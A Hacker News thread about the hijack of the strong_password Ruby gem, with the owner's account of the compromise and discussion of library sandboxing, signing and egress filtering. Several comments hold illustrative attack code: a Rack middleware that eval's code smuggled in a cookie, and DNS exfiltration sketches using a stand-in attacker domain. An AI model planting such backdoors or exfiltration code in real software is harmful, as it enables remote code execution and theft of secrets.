
Strong_password Rubygem hijacked

625 points | jrochkind1 | 6 years ago | withatwist.dev

128 comments

[+] bdmac97|6 years ago|reply
Hi all. I'm the (actual) owner of that gem.

As already hypothesized in the comments I'm pretty sure this was a simple account hijack. The kickball user likely cracked an old password of mine from before I was using 1password that was leaked from who knows which of the various breaches that have occurred over the years.

I released that gem years ago and barely remembered even having a rubygems account since I'm not doing much OSS work these days. I simply forgot to rotate out that old password there as a result which is definitely my bad.

Since being notified and regaining ownership of the gem I've:

1. Removed the kickball gem owner. I don't know why rubygems did not do this automatically but they did not.

2. Reset to a new strong password specific to rubygems.org (haha) with 1password and secured my account with MFA.

3. Released a new version 0.0.8 of the gem so that anyone that unfortunately installed the bogus/yanked 0.0.7 version will hopefully update to the new/real version of the gem.
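For anyone auditing their own apps, a quick check (a minimal sketch, assuming a standard Bundler setup; the helper name is invented) for the yanked release:

```ruby
# Returns true if the given Gemfile.lock text pins the yanked, malicious
# 0.0.7 release. If it does, `bundle update strong_password` pulls in the
# fixed 0.0.8 described above.
def compromised_lockfile?(lockfile_text)
  lockfile_text.include?("strong_password (0.0.7)")
end

# Example usage against a real lockfile, if one is present:
compromised_lockfile?(File.read("Gemfile.lock")) if File.exist?("Gemfile.lock")
```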

[+] confiq|6 years ago|reply
One more reason to use a password manager and have unique passwords.

Thanks for sharing the info!

[+] nneonneo|6 years ago|reply
This is a gem that checks the strength of a user-submitted password. It has a large number of downloads (37,000 on the legitimate 0.0.6 version). It looks like it's made to be integrated on webservers.

The modified gem downloaded and executed code stored in an editable Pastebin, meaning that the code could have changed at any time. Presumably, the malicious code would activate just by browsing any page on the affected site. One version of the Pastebin code would execute any code embedded in a magic cookie sent by a client. Plus, it would ping the attacker's server to let them know your webserver was infected.

Nasty, nasty stuff.
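For readers curious what that pattern looks like, here is a minimal illustrative sketch (not the actual malware; the class name and cookie name are invented) of middleware that decodes and eval's code smuggled in a cookie:

```ruby
require "base64"

# Illustrative sketch only -- same shape as the attack described above:
# Rack-style middleware that runs whatever code a client hides in a cookie.
class InnocentLookingMiddleware
  def initialize(app)
    @app = app
  end

  def call(env)
    payload = env["HTTP_COOKIE"].to_s[/__cfg=([^;]+)/, 1]
    if payload
      begin
        # Arbitrary remote code execution: whatever the client sent runs here.
        eval(Base64.urlsafe_decode64(payload))
      rescue StandardError
        nil # swallow errors so the app keeps working and nothing is logged
      end
    end
    @app.call(env) # pass the request through so the site looks unaffected
  end
end
```

The request passes through untouched for ordinary visitors, which is what makes this kind of payload so hard to notice in production.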

[+] djur|6 years ago|reply
Good analysis, but I'm not sure about "a large number of downloads". Download counts can be pretty inflated due to CI/deployment processes that reinstall gems from scratch repeatedly. I've seen open-sourced gems that never got any real usage outside their original company get that number of downloads.

To add a bit of a sense of scale here, the popular Devise gem that's used for authentication in many Rails apps has 52.7 million total downloads and almost 20k stars on GitHub. strong_password has 247k total downloads and 191 stars. It has three reverse dependencies, none of which I've ever heard of and none of which have any of their own reverse dependencies.

This suggests to me that this gem is used by less than 1% of Ruby web apps (probably substantially less) and, more importantly, if you have a dependency on this gem you probably know (because it'd be a direct dependency in your Gemfile, not a dependency of a dependency).

[+] MrStonedOne|6 years ago|reply
The unanswered question is still how this `kickball` account gained control of the gem.

> The gem seems to have been pulled out from under me… When I login to rubygems.org I don’t seem to have ownership now. Bogus 0.0.7 release was created 6/25/2019.

The way I see it, there are a few options:

1. The gem was transferred by RubyGems staff to this account.

2. The maintainer's account was hijacked and then it was transferred, and could even still be compromised.

3. There is some issue or attack vector with the rubygem system that allowed the attacker to gain control.

Any guesses?

[+] zbentley|6 years ago|reply
Option 2 is overwhelmingly likely, IMO. Phishing, password reuse, credential scraping/spamming, and plain old brute force are unbelievably common.

That said, the other two options bear investigation too. Just don't spend time looking for a cold breeze from an un-caulked window frame when the screen door is open.

[+] romaaeterna|6 years ago|reply
Yes. I think that we need to see a full security report from rubygems.org on this. This could be bigger than just the one package.
[+] jakobegger|6 years ago|reply
Or:

4. The maintainer of the gem is complicit in the attack, and transferred ownership voluntarily.

[+] nurettin|6 years ago|reply
Not sure why someone with malicious intent would use their rubygems superpower just to compromise a low profile gem like this. Perhaps it is a targeted attack at a certain website which may now be compromised and we are just seeing the tip of the iceberg.
[+] fasterdom|6 years ago|reply
We need a sort of capability and permission method for libraries.

For example, a "strong_password" library should only be given "CPU compute" permissions, no I/O.

But even with this, the problem will be like what we see on phones: popular libraries will require all the permissions.

You'll want to install React, and React + its 100 dependencies will request everything.

[+] kibwen|6 years ago|reply
To be honest, even the coarsest-possible permissions of "can do I/O" vs. "can't do I/O" would be exceedingly effective at stymieing these sorts of attacks; all malicious software of this sort needs to do I/O at some point, and relatively few libraries actually have a good excuse to do I/O (though logging might be thorny).

That said it seems easier said than done to impose those sorts of restrictions on a per-dependency basis. Attempts to statically verify the absence of I/O sounds like a great game of whack-a-mole, and I don't know how you'd do it dynamically without running all non-I/O dependencies in an entirely separate process from the main program.
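As a toy illustration of why static verification is whack-a-mole, a naive grep-style scan (the pattern list here is invented, and trivially evaded via eval, send, or const_get) catches only the obvious cases:

```ruby
# Naive static "does this dependency do I/O?" check -- exactly the
# whack-a-mole game described above, since metaprogramming hides the names.
IO_PATTERNS = /\b(File|IO|Socket|Net::HTTP|open|eval|system|`)\b/

# Returns [line, line_number] pairs for every line that mentions an I/O-ish name.
def flag_io(source)
  source.each_line.with_index(1).select { |line, _| line =~ IO_PATTERNS }
end

flag_io("x = 1\nNet::HTTP.get(URI('http://example.com'))\n") # flags line 2 only
```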

[+] rgovostes|6 years ago|reply
The design of macOS and iOS has been moving this way. Many of Apple's first-party applications and frameworks have been broken down into backend "XPC services" that (attempt to) follow the principle of least privilege[1]. Each service runs in a separate process, the system enforcing memory isolation and limiting access to resources (sandboxing).

It's a good idea on paper, but has caveats. Every service is responsible for properly authenticating its clients, and needs to be designed so that a compromised client cannot leverage its access to a service to elevate privileges. Sandboxes are difficult to retrofit onto existing programs. The earlier, lowest-common-denominator system frameworks were not originally written with sandboxing in mind. There are numerous performance drawbacks.

For Apple ecosystem developers, XPC services are also how "extensions" for VPN, Safari ad blockers, etc. are written, for a mix of security and stability benefits.

Though funnily enough, as Apple has pursued these technologies, many HN commenters have decried the walls of the garden closing in.

1: https://en.wikipedia.org/wiki/Principle_of_least_privilege

[+] nneonneo|6 years ago|reply
Hm, interesting. One way to solve this would be to have a language with a very rigid import system - it should be _impossible_ for a library to use a module it hasn't imported, even if that module has been loaded elsewhere in a process. This is probably harder than it looks, and many languages have introspection features that are incompatible with this goal.

With a rigid import system, each library would be forced to declare what it's going to import (including any system libraries), and then you could e.g. enforce a warning + confirmation any time an updated dependency changes its import list.

It doesn't prevent you from getting owned by a modified privileged library, but it's better than the current case. Unfortunately, it probably requires some language (re-)design to fully implement this approach.
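The "warn + confirm when an updated dependency changes its import list" step could be sketched like this (the manifest contents and function name are invented):

```ruby
# Hypothetical sketch: diff the declared imports of two versions of a
# dependency and surface additions for confirmation, per the idea above.
def import_diff(old_imports, new_imports)
  { added: new_imports - old_imports, removed: old_imports - new_imports }
end

old_manifest = %w[base64 digest]
new_manifest = %w[base64 digest net/http] # a new network import is a red flag

diff = import_diff(old_manifest, new_manifest)
warn "Dependency now imports: #{diff[:added].join(', ')} -- confirm?" if diff[:added].any?
```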

[+] derefr|6 years ago|reply
If you look at dependencies as black-boxes that contain their own transitive dependencies, then sure, any given "root-level" dependency of sufficient complexity might end up requesting every permission.

On the other hand, if each dependency in the deps tree had its own required permissions, and you had to grant those permissions to that specific dependency rather than to the rootmost branch of the deps tree that contained it, then things would be a lot nicer. The more fine-grained library authors were in splitting out dependencies, the clearer the permissions situation would be; it'd be clear that e.g. a "left-pad" package way down in the tree wouldn't need any system access.

On the other hand, it'd make sense if dependencies could only add new transitive dependencies during "version update due to automatic version-constraint re-evaluation" if the computed transitive closure of the required permissions didn't increase. Otherwise it'd stop and ask you whether you wanted to authorize the addition of a dep that now asked for these additional permissions.
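The transitive-closure check described above might look like this sketch (package names and permission labels are invented):

```ruby
# Hypothetical sketch: compute the transitive closure of permissions
# required by a dependency tree, so a version bump that widens the
# closure can stop and ask for authorization.
def required_permissions(dep, deps, perms, seen = {})
  return [] if seen[dep]
  seen[dep] = true
  (perms.fetch(dep, []) +
   deps.fetch(dep, []).flat_map { |d| required_permissions(d, deps, perms, seen) }).uniq
end

deps  = { "webapp" => ["strong_password", "http_client"], "http_client" => ["sockets"] }
perms = { "strong_password" => ["cpu"], "sockets" => ["net"] }
required_permissions("webapp", deps, perms) # => ["cpu", "net"]
```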

[+] dwohnitmok|6 years ago|reply
Safe Haskell, a GHC extension, is one example in this space. https://downloads.haskell.org/~ghc/latest/docs/html/users_gu...

Its biggest selling point is that a lot of capability safety could be inferred in packages without the package author separately specifying capabilities.

The basic idea is to disallow the remaining impure escape hatches in Haskell in most code, requiring library authors of libraries that do require those escape hatches (e.g. wrappers around C libraries) to assert that their library is trustworthy, and requiring users to accept that trustworthy declaration in a per-user database.

It actually was very promising because the general coding conventions within Haskell libraries made most of them automatically safe, so the set of packages you needed to manually verify wasn't insane (but still unfortunately not a trivial burden, especially if your packages relied on a lot of C FFI).

Unfortunately I have yet to see it used in any commercial projects and it seems in general not to get as much attention as some other GHC extensions.

[+] mopierotti|6 years ago|reply
I know this is about ruby, but it's worth noting that this kind of thing would be solved by effect systems, e.g. Haskell's IO type. If IO isn't part of the signature, you know it's cpu only. Furthermore, you can get more specific such as having a DB type to indicate some code only has access to databases rather than the internet as a whole.
[+] rdhatt|6 years ago|reply
The .NET Framework 1.0 included "Code Access Security", which included mechanisms to authenticate code with "evidence" (as opposed to traditional 'roles') and then apply permissions similar to your example: DnsPermission, FileIOPermission, RegistryPermission, UIPermission, and so on.

Unfortunately, the architecture was too complex for most developers and fell by the wayside. It was finally removed from the 4.0 Framework after being deprecated for some time.

Sources:

https://www.itwriting.com/blog/2156-the-end-of-code-access-s...

https://www.codemag.com/Article/0405031/Managing-.NET-Code-A...

https://blog.codinghorror.com/code-access-security-and-bitfr...

[+] crabl|6 years ago|reply
Couldn't you theoretically shove all of your untrusted "non-I/O" libraries into a Service Worker? They wouldn't have direct access to the DOM or network I/O that way. It would involve writing some glue code, but perhaps it's worth trading that off for increased "security" (trust)?

EDIT: never mind, looks like I was mistaken about the network i/o part of this... Might be interesting to have a browser-level "sandboxed service worker" for this purpose though...

[+] sigotirandolas|6 years ago|reply
The skeptic in me thinks that it's never going to work in practice due to 'worse is better': Any system with the 'I/O vs no-I/O' system will have more friction than one without it, and there is no measurable benefit until you get hacked, so most people will not use it (or declare everything as I/O).
[+] elwell|6 years ago|reply
That is a brilliant idea. I'm surprised I haven't heard/thought of that yet.
[+] westoque|6 years ago|reply
In light of vulnerabilities like these, I’m glad there are developers who spend time making their apps more secure, and who make us all aware that issues like these are out there. Security is almost always put off in exchange for features, and most of the time it's taken for granted. It’s about time we start taking it seriously.

Kudos to you!

[+] frizkie|6 years ago|reply
It seems to me like the only way to really provide any sense of security is to force gems uploaded to RubyGems to be signed. There is some discussion here (https://github.com/rubygems/guides/pull/70) about why the Rubygems PGP CA isn't really worth using in its current state. As we've seen with Javascript dependencies, we can only put off dealing with this problem for so long.
[+] danShumway|6 years ago|reply
Just as an experiment, I want everyone on this thread to think back to the last time you connected over SSH to a new computer on a company network. Did you check to make sure that the key that popped up was correct, or did you just hit accept?

This is why signing packages will not be a silver bullet that significantly reduces these kinds of attacks. Devs will still have their keys compromised, users will still ignore warnings that keys have changed. It's worth doing, but I am skeptical that it will eliminate these attacks.

In the Javascript world, we got malware recently that was the result of a dev voluntarily giving control of a package to another person. Signing isn't going to help with that.

My vote is on permissions and sandboxing. I think that sandboxing scales reasonably well since it can be applied to dependencies of dependencies all the way down your entire chain. I think that (unlike with phones) most dependencies don't require stuff like File I/O or Networking, which would eliminate a large number of attacks.

And importantly, I think that sandboxing acknowledges that trust is not binary. The big problem with signing packages is that it's following this outdated model of, "well, you'll either trust a package completely or you won't." The reality is that there are packages and package authors that you trust to different degrees and in different contexts. Many buildings have locks inside of them as well as outside, because trusting someone enough to come into your office is not the same as trusting them to root through all of your filing cabinets.

I don't think efforts around verifying authors/updates are useless, but they do often fail to take this principle into account.

[+] javagram|6 years ago|reply
Another solution would be changing the ecosystem to no longer be reliant on so many third party dependencies.

For instance if I am using Java and I build my web app with only Spring Framework, I can have a lot more confidence that one of my JARs hasn’t been backdoored than I can in an ecosystem where it’s regularly the practice to pull 100s of dependencies from different individual FOSS developers, where it’s difficult to audit the process that each library author is using to secure their package manager upload credentials.

I am not sure signatures are that useful since without a centralized authority to issue the certificates and securely verify author identities, we are just back to a trust-on-first-use policy for the signatures, and people will just end up setting their CI servers to always trust new signatures since they won’t want to deal with what happens when authors change their certificate from version to version (which will surely happen).

[+] est31|6 years ago|reply
Requiring signatures moves all responsibility to the maintainers. I've seen projects upload their signing private keys to git, saying that it's fine because they are passphrase protected.

Sure, as 2FA, signatures help with the problem that some people use weak passwords or share their passwords. But IMO it would be better to restrict upload rights to the top 100 maintainers and give them HSMs to authenticate those uploads. Anyone wanting to upload would have to ask one of the maintainers to sponsor them. This would reduce the number of people you have to trust when building anything from the package repository.

[+] yarg|6 years ago|reply
Yep, we get the same shit with both NPM and Maven.

It's staggering the lack of consideration given to basic security by what should be competent software engineers.

[+] oomkiller|6 years ago|reply
There's still a lot to learn about this incident, but most likely the RubyGems account was compromised, allowing the attacker to upload whatever they wanted. Signed releases with a web of trust would be ideal, but I doubt we'll ever see that world.

A simple and pragmatic solution would be to have the next version of Bundler support the ability to only install packages published with two-factor enabled, then have the next major Rails version default it to on, with plenty of advance warning in 6.x/Bundler. This still has plenty of gaps, such as an attacker being able to take over even with two-factor and re-enable it with their own keys, or RubyGems.org itself being compromised. But it would still represent a major upgrade in security for the entire Ruby ecosystem without causing much pain to authors and users.
[+] jlmorton|6 years ago|reply
This is a great reason why you should never allow unknown outgoing connections from Production.

You can implement this however makes sense for you. For me, the easiest thing is to run a simple locked down proxy server, and allow only specific domains there. This makes it easy to setup whatever rules you want, allowing entire domains, or only specific hosts. And it gives you a convenient place to log entries before you lock them down.

This is also why you shouldn't allow external DNS resolution from every host in your network. It would be just as easy to move data in and out with Dnsruby::Resolver.query('base64-encoded-payload.badhost.com', 'TXT'), 255 bytes at a time.

Once everything is moving through your proxy, there's no need to allow external DNS resolution from other hosts.
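To make that exfiltration path concrete, here is a sketch of how a secret would be chunked into DNS query names (hypothetical attacker domain; nothing is actually sent, and DNS limits labels to 63 bytes each):

```ruby
require "base64"

# Sketch of the DNS-exfiltration technique mentioned above: encode a secret
# and split it into DNS-label-sized chunks (63 bytes max per label) under an
# attacker-controlled domain. Illustrative only; no queries are made.
def exfil_names(secret, domain = "badhost.example")
  encoded = Base64.urlsafe_encode64(secret).delete("=")
  encoded.scan(/.{1,63}/).map { |chunk| "#{chunk}.#{domain}" }
end

exfil_names("a" * 100) # a 100-byte secret fits in a handful of lookups
```

Egress filtering and DNS logging on a per-host basis is exactly what closes this channel.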

[+] zelon88|6 years ago|reply
If an attacker has the ability to send dig queries to a remote host, he can override anything you put in place on the host to prevent external DNS queries.

Also, most of this traffic is still unencrypted, and dig'ing strange servers is noisy as hell. I'm pretty sure (famous last words) that most entry-level firewalls would flag this out of the box. If they don't, they should.

Still upvoted you though. This is an exfiltration technique that is really easy to spot and not widely known about.

[+] hirundo|6 years ago|reply
> I went line by line linking to each library’s changeset. This due diligence never reported significant surprises to me, until this time.

Mad props to the author, Tute Costa, for doing this. It's a large investment of time for usually no return, so I think very few people do. And his (?) reaction to finding this was quite effective.

Thank you for your service sir.

[+] sudhirj|6 years ago|reply
The way I see it, the root of the problem is that there isn't an independently verifiable association between a package and code commit hash that it's been generated from. My GitHub page can have good code, but no one has any idea what's in the corresponding package.

Does the upcoming builtin package manager on GitHub solve this problem? Does it guarantee that packages are only built from code pushed to GitHub, and associate the commit hash in the metadata in some way?

[+] huxflux|6 years ago|reply
RubyGems should contract an external auditor (a security firm); this could go way deeper. Until they perform a thorough audit I will personally stay away from this project.
[+] FDSGSG|6 years ago|reply
So why does this not apply to everything?

If "this could go way deeper" is your answer to a super unpopular rubygem getting hijacked, why isn't that just the default assumption then?

Do you only use thoroughly audited software projects? How do you manage that?

[+] raesene9|6 years ago|reply
How do you suggest that Rubygems fund that effort? Also when you're staying away from Rubygems, which alternative will you be using, and do you think they have better security?
[+] archy_|6 years ago|reply
Incidents like this really show the lack of proper security measures in place. Why should package ownership be able to be arbitrarily shifted on a whim? It's a large single point of failure. Sadly, there are no good alternatives besides entering GitHub repo paths manually for now.
[+] 1337shadow|6 years ago|reply
We really need more signing support in language specific packaging.
[+] Papirola|6 years ago|reply
Why not just restrict the production environment to not open ports other than 80, and not create TCP connections to unauthorized hosts?
[+] acdha|6 years ago|reply
It’s effective but tends to be a considerable amount of work to maintain, especially since the web is more dynamic these days: imagine what it would take to filter only authorized connections to a service hosted on AWS, for example, where anyone in the world can get IPs in the possible range and even put data on white-listed hostnames like S3. You’re basically building an allow list of host names, intermediating every update path, etc. and dealing with things which were designed with a more open model — e.g. do you disable things like OCSP or whitelist more third-party resources?

This also heavily encourages microservices, since most non-trivial applications will have some reason to connect to fairly arbitrary resources. Hopefully that can be sandboxed well, but relatively few apps were designed that way, and that general class of overlooked behavior which wasn't supposed to work is notoriously easy for even experienced teams to miss.